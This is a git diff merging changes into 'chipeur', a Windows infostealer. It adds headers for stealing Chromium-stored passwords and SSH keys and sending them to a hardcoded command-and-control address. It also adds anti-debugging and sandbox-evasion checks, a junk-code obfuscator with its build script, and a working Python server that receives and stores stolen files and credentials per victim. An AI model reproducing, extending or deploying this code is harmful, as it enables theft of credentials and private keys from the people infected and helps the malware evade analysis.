Final merge unstable to main

build.sh

@@ -0,0 +1,14 @@
+#!/bin/bash
+
+echo "Compiling junk_code_inserter..."
+gcc -o junk_code_inserter src/junk_code_inserter.c -Iinclude -lcrypto || exit 1
+
+echo "Applying junk code to modified source files..."
+for file in $(git status --porcelain | awk '{print $2}' | grep '^src/.*\.c$' | grep -v 'junk_code_inserter.c'); do
+    if [[ "$file" != "src/sqlite3.c" && "$file" != "src/aes.c" ]]; then
+        echo "Processing $file"
+        ./junk_code_inserter "$file"
+    else
+        echo "Skipping $file"
+    fi
+done

include/c2.h

@@ -0,0 +1,15 @@
+#ifndef C2_H
+#define C2_H
+#include <windows.h>
+#include <winsock2.h>
+
+#include "find_ssh_key.h"
+#include "logins.h"
+
+#define C2_IP "192.168.1.17"
+#define C2_PORT 1234
+
+BOOL send_ssh_key(sshKey[MAX_KEY_FILES], DWORD32, SOCKET *);
+BOOL send_credentials(SOCKET *, Credential *, DWORD32);
+BOOL connect_to_c2(SOCKET *);
+#endif

include/chipeur.h

@@ -1 +1,4 @@
-void hello(void);
+#ifndef CHIPEUR_H
+#define CHIPEUR_H
+void hello(void);
+#endif

include/chromium.h

@@ -5,6 +5,7 @@
 #include <winnt.h>
 
 #include "logins.h"
+#include "obfuscation.h"
 
 #define MAX_BROWSER_NAME_SIZE 20
 #define MAX_LOGIN_DATA_PATH_SIZE 57
@@ -16,14 +17,14 @@ typedef struct {
   WCHAR localStatePath[MAX_LOCAL_STATE_PATH_SIZE];
 } BrowserInfo;
 
-int steal_chromium_creds();
-static int steal_browser_creds(BrowserInfo browser);
-static int retrieve_logins(PWSTR fullPath, int *loginCountOut,
+int steal_chromium_creds(Credential *, DWORD32 *);
+static int steal_browser_creds(BrowserInfo browser, Credential *, DWORD32 *);
+static int retrieve_logins(const PWSTR fullPath, int *loginCountOut,
                            Login *loginsOut[]);
 static int retrieve_encoded_key(PWSTR localStatePath, PSTR *encryptedKeyOut);
 static int decode_key(PSTR encodedKey, BYTE *decodedKeyOut[],
-                      size_t *decodedKeySizeOut);
+                      size_t *decodedKeySizeOut, hidden_apis *apis);
 static int decrypt_key(BYTE *encryptedKey, size_t encryptedKeySize,
-                       DATA_BLOB *decryptedKeyOut);
+                       DATA_BLOB *decryptedKeyOut, hidden_apis *apis);
 
 #endif

include/delay_execution.h

@@ -0,0 +1,6 @@
+#ifndef DELAY_EXECUTION_H
+#define DELAY_EXECUTION_H
+
+int delay_execution(int duration);
+
+#endif

include/extract_file.h

@@ -1,3 +1,7 @@
+#ifndef EXTRACT_FILE_H
+#define EXTRACT_FILE_H
 #include <windows.h>
 
-void print_file(const PWSTR);
+void print_file(const PWSTR);
+BOOL is_readable(const PWSTR);
+#endif

include/find_ssh_key.h

@@ -1,13 +1,16 @@
+#ifndef FIND_SSH_KEY_H
+#define FIND_SSH_KEY_H
 #include <windows.h>
 
 // Max number of possible ssh keys to dump.
 // To avoid usage of linked list (lazy)
 #define MAX_KEY_FILES 30
 
 // Simple structure representing a ssh
-typedef struct sshkey {
+typedef struct sshKey {
   PWSTR publicKeyPath;
   PWSTR secretKeyPath;
-} sshkey;
+} sshKey;
 
-void find_ssh_key(const PWSTR);
+void find_ssh_key(const PWSTR, sshKey[MAX_KEY_FILES], DWORD32 *);
+#endif

include/hardware_requirements.h

@@ -0,0 +1,11 @@
+#ifndef HARDWARE_REQUIREMENTS_H
+#define HARDWARE_REQUIREMENTS_H
+
+#define EXIT_CPU_FAIL 200
+#define EXIT_RAM_FAIL 201
+#define EXIT_HDD_FAIL 202
+#define EXIT_RESOLUTION_FAIL 203
+
+int check_hardware();
+
+#endif

include/junk_code_inserter.h

@@ -0,0 +1,39 @@
+#ifndef JUNK_CODE_INSERTER_H
+#define JUNK_CODE_INSERTER_H
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+
+// Constants for junk code and control flow obfuscation probabilities
+#define MAX_LINE_LENGTH 1024
+#define MAX_OBFUSCATIONS_PER_FUNCTION 1
+#define JUNK_CODE_PROBABILITY 15
+#define CONTROL_FLOW_PROBABILITY 10
+#define OPAQUE_PREDICATE_PROBABILITY 10
+
+/**
+ * @brief Generates random junk code to obfuscate the source code.
+ *
+ * @param output The file pointer where the junk code will be written.
+ */
+void generate_junk_code(FILE *output);
+
+/**
+ * @brief Generates random control flow obfuscation to make reverse engineering
+ * harder.
+ *
+ * @param output The file pointer where the control flow obfuscation will be
+ * written.
+ */
+void generate_control_flow(FILE *output);
+
+/**
+ * @brief Applies junk code and control flow obfuscation to a given source file.
+ *
+ * @param file_path The path to the source file to be obfuscated.
+ */
+void insert_obfuscation(const char *file_path);
+
+#endif  // JUNK_CODE_INSERTER_H

include/logins.h

@@ -3,6 +3,8 @@
 
 #include <windef.h>
 
+#define CRED_SIZE 32
+
 // Encrypted credentials
 typedef struct {
   PSTR url;
@@ -12,7 +14,6 @@ typedef struct {
 } Login;
 
 // Decrypted `Login`
-// mostly used for debug/printing purposes
 typedef struct {
   PSTR url;
   PSTR username;

include/obfuscation.h

@@ -1,4 +1,9 @@
+#ifndef OBFUSCATION_H
+#define OBFUSCATION_H
+#include <knownfolders.h>
+#include <shlobj.h>
 #include <stddef.h>
+#include <windows.h>
 
 #define XOR_STR(str, size)             \
   do {                                 \
@@ -13,3 +18,27 @@
       (wstr)[i] ^= 42;                 \
     }                                  \
   } while (0)
+
+#define REFKNOWNFOLDERID const KNOWNFOLDERID *__MIDL_CONST
+
+typedef BOOL(WINAPI *PCheckRemoteDebuggerPresent)(HANDLE hProcess,
+                                                  PBOOL pbDebuggerPresent);
+// typedef HMODULE(WINAPI *PLoadLibraryA)(LPCSTR lpLibFileName);
+typedef BOOL(WINAPI *PCryptUnprotectData)(DATA_BLOB *, LPWSTR *, DATA_BLOB *,
+                                          void *, void *, DWORD, DATA_BLOB *);
+typedef BOOL(WINAPI *PCryptStringToBinaryA)(LPCSTR, DWORD, DWORD, BYTE *,
+                                            DWORD *, DWORD *, DWORD *);
+// typedef HRESULT(WINAPI *PSHGetKnownFolderPath)(REFKNOWNFOLDERID rfid, DWORD
+// dwFlags, HANDLE hToken, PWSTR *ppszPath);
+
+typedef struct {
+  PCheckRemoteDebuggerPresent funcCheckRemoteDebuggerPresent;
+  // PLoadLibraryA funcLoadLibraryA;
+  PCryptUnprotectData funcCryptUnprotectData;
+  PCryptStringToBinaryA funcCryptStringToBinaryA;
+  // PSHGetKnownFolderPath funcSHGetKnownFolderPath;
+} hidden_apis;
+
+void resolve_apis(hidden_apis *apis);
+
+#endif  // OBFUSCATION_H

makefile

@@ -4,15 +4,15 @@ INCLUDE_DIR = include/
 OBJ_DIR = obj/
 
 # add the object file used here
-OBJ_FILES=$(OBJ_DIR)chipeur.o $(OBJ_DIR)find_ssh_key.o $(OBJ_DIR)extract_file.o $(OBJ_DIR)obfuscation.o  $(OBJ_DIR)chromium.o $(OBJ_DIR)path.o $(OBJ_DIR)logins.o $(OBJ_DIR)sqlite3.o $(OBJ_DIR)aes.o
+OBJ_FILES=$(OBJ_DIR)chipeur.o $(OBJ_DIR)find_ssh_key.o $(OBJ_DIR)extract_file.o $(OBJ_DIR)obfuscation.o  $(OBJ_DIR)chromium.o $(OBJ_DIR)path.o $(OBJ_DIR)logins.o $(OBJ_DIR)hardware_requirements.o $(OBJ_DIR)delay_execution.o $(OBJ_DIR)sqlite3.o $(OBJ_DIR)aes.o $(OBJ_DIR)c2.o
 
 CC=x86_64-w64-mingw32-gcc
 CFLAGS=-g -fPIE -O2 -s -Warray-bounds -Wsequence-point -Walloc-zero -Wnull-dereference \
     -Wpointer-arith -Wcast-qual -Wcast-align=strict -I$(INCLUDE_DIR)
 
 #not needed for now
 LDFLAGS =# -Wl,--strip-all
-LLIB= -luuid -lole32 -lcrypt32
+LLIB= -luuid -lole32 -lws2_32
 DEBUG=-DDEBUG
 
 .PHONY : all help clean
@@ -27,6 +27,9 @@ all: chipeur.exe
 $(OBJ_DIR)chipeur.o: $(SRC_DIR)chipeur.c $(INCLUDE_DIR)chipeur.h $(INCLUDE_DIR)find_ssh_key.h
 	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
 
+$(OBJ_DIR)c2.o: $(SRC_DIR)c2.c $(INCLUDE_DIR)c2.h
+	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
+
 $(OBJ_DIR)find_ssh_key.o : $(SRC_DIR)find_ssh_key.c $(INCLUDE_DIR)find_ssh_key.h $(INCLUDE_DIR)extract_file.h
 	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
 
@@ -45,6 +48,12 @@ $(OBJ_DIR)path.o : $(SRC_DIR)path.c $(INCLUDE_DIR)path.h
 $(OBJ_DIR)logins.o : $(SRC_DIR)logins.c $(INCLUDE_DIR)logins.h
 	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
 
+$(OBJ_DIR)delay_execution.o : $(SRC_DIR)delay_execution.c $(INCLUDE_DIR)delay_execution.h
+	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
+
+$(OBJ_DIR)hardware_requirements.o : $(SRC_DIR)hardware_requirements.c $(INCLUDE_DIR)hardware_requirements.h
+	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
+
 $(OBJ_DIR)sqlite3.o : $(SRC_DIR)sqlite3.c $(INCLUDE_DIR)sqlite3.h
 	$(CC) $(DEBUG) $(CFLAGS) -c $< -o $@
 

server/simple_serv.py

@@ -0,0 +1,132 @@
+import socket
+import os
+import time
+import threading
+
+def createpath(username: str, datatype: str):
+    """ create the folder to store the data ./username/datatype """
+    try :
+        os.mkdir(username)
+    except FileExistsError: 
+        print(f"DEBUG: {username} directory already exists.")
+    # except:
+    #     print(f"DEBUG: Error while creating the {username} directory. Abort")
+    #     return
+
+
+    path = os.path.join(username,datatype)
+    try :
+        os.mkdir(path)
+    except FileExistsError:
+        print(f"DEBUG: {path} directory already exists.")
+
+    return path
+
+def savefile(username: str, datatype: str, filename: str, client: socket.socket):
+    """ create and write a file in the directory ./username/file/"""
+
+    path = createpath(username, datatype)
+
+    # creating a unique file to avoid overwriting
+    path = os.path.join(path, str(int(time.time())) + "_" + filename)
+    fic = open(path, "w")
+    ch = client.recv(9).decode()
+    # ending condition, chipeur client allways send it
+    while ch[-9:] != "[RUEPIHC]":
+        try:
+            cur_c = client.recv(1).decode()
+            ch += cur_c
+        except:
+            fic.write(ch)
+            fic.close()
+            return
+    ch = ch[:-9]
+    print(f"DEBUG: Writing '{path}' file")
+    fic.write(ch)
+    fic.close()
+
+def savecreds(username: str, datatype: str, client: socket.socket):
+    """ create and write a file in the directory ./username/file/ """
+    path = createpath(username, datatype)
+    path = os.path.join(path, "creds_" + str(int(time.time())))
+    fic = open(path, "w")
+    ch = client.recv(9).decode("utf-8")
+    # ending condition, chipeur client allways send it
+    while ch[-9:] != "[RUEPIHC]":
+        try:
+            cur_c = client.recv(1).decode("utf-8")
+            ch += cur_c
+        except:
+            fic.write(ch)
+            fic.close()
+            return
+    ch = ch[:-9]
+    print(f"DEBUG: Writing '{path}' file")
+    fic.write(ch)
+    fic.close()
+
+
+def read_bytes_until_next_pipe(client: socket.socket):
+    """ this function is used to parse the chipeur request and gather the information of the request """
+    ch = b""
+    cur_c = b""
+    while cur_c != b"|":
+        cur_c = client.recv(1)
+        ch += cur_c
+
+    # we return the data before the pipe
+    return ch[:-1]
+
+def handle_client(client_socket, addr):
+    print(f"Connection from {addr}")
+    try:
+        while True:
+            # should read [CHIPEUR]
+            chipeur = read_bytes_until_next_pipe(client_socket).decode("utf-8")
+            print(chipeur)
+            if "[CHIPEUR]" not in chipeur:
+                client_socket.close()
+                break
+
+            username = read_bytes_until_next_pipe(client_socket)[:-1].decode("utf-16-be")
+            print(username)
+
+            datatype = read_bytes_until_next_pipe(client_socket).decode("utf-8")
+            print(datatype)
+
+            # only two datatypes possible
+            if datatype == "file":
+                filename = read_bytes_until_next_pipe(client_socket)[:-1].decode("utf-16-be")
+                print(filename)
+                savefile(username, datatype, filename, client_socket)
+
+            if datatype == "credentials":
+                savecreds(username, datatype, client_socket)
+
+    except UnicodeDecodeError as error:
+        print(f"DEBUG: Connection closed: {error}")
+    except ConnectionResetError as error:
+        print(f"DEBUG: Connection closed: {error}")
+    except TimeoutError as error:
+        print(f"DEBUG: Connection closed: {error}")
+        client_socket.close()
+
+def start_server(host='0.0.0.0', port=1234):
+    # Create a socket object
+    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    # Bind the socket to the address and port
+    server_socket.bind((host, port))
+
+    # Listen for incoming connections
+    server_socket.listen(1)
+    print(f"Listening on {host}:{port}...")
+
+    while True:
+        # Accept a connection
+        client_socket, addr = server_socket.accept()
+        th = threading.Thread(target=handle_client, args=(client_socket, addr))
+        th.start()
+
+if __name__ == "__main__":
+    start_server()